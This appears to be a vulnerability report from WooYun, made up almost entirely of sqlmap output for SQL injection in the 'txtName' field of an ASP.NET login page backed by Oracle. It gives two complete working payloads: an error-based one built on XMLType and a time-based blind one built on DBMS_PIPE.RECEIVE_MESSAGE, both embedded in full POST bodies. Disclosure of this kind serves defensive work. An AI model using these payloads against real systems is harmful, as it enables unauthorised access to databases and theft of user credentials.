WooYun.org

---
Place: POST
Parameter: txtName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __VIEWSTATE=/wEPDwUJOTQ2ODIyODMwD2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUn5a 55LiN6LW377yM55So5oi35ZCN5oiW5a G56CB6ZSZ6K v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgcFCVJibnRSZWNubwUKUmJudENhcmRubwUKUmJudENhcmRubwUJUmJudEVtYWlsBQlSYm50RW1haWwFB1JibnRUZWwFB1JibnRUZWz3GJAF/ID6hFxM1AUmZgdhmCPDHA==&__EVENTVALIDATION=/wEWCAK3zdnADwLEhISFCwK1qbSWCwKxi8njCgLY78S0CwLJ8fnVDwLahr8QAuLjh4YMZt4383LPJg7KvPMkDGKSX/UN HA=&txtName=aaaaaaa' AND 9343=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(103)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9343=9343) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(102)||CHR(117)||CHR(113)||CHR(62))) FROM DUAL) AND 'ROQu'='ROQu&txtPassWord=aaaaaaaaaaa&Logintype=RbntRecno&BtnLogin=%E7%99%BB %E5%BD%95
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: __VIEWSTATE=/wEPDwUJOTQ2ODIyODMwD2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUn5a 55LiN6LW377yM55So5oi35ZCN5oiW5a G56CB6ZSZ6K v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgcFCVJibnRSZWNubwUKUmJudENhcmRubwUKUmJudENhcmRubwUJUmJudEVtYWlsBQlSYm50RW1haWwFB1JibnRUZWwFB1JibnRUZWz3GJAF/ID6hFxM1AUmZgdhmCPDHA==&__EVENTVALIDATION=/wEWCAK3zdnADwLEhISFCwK1qbSWCwKxi8njCgLY78S0CwLJ8fnVDwLahr8QAuLjh4YMZt4383LPJg7KvPMkDGKSX/UN HA=&txtName=aaaaaaa' AND 4420=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(97)||CHR(112)||CHR(87),5) AND 'FSQy'='FSQy&txtPassWord=aaaaaaaaaaa&Logintype=RbntRecno&BtnLogin=%E7%99%BB %E5%BD%95
---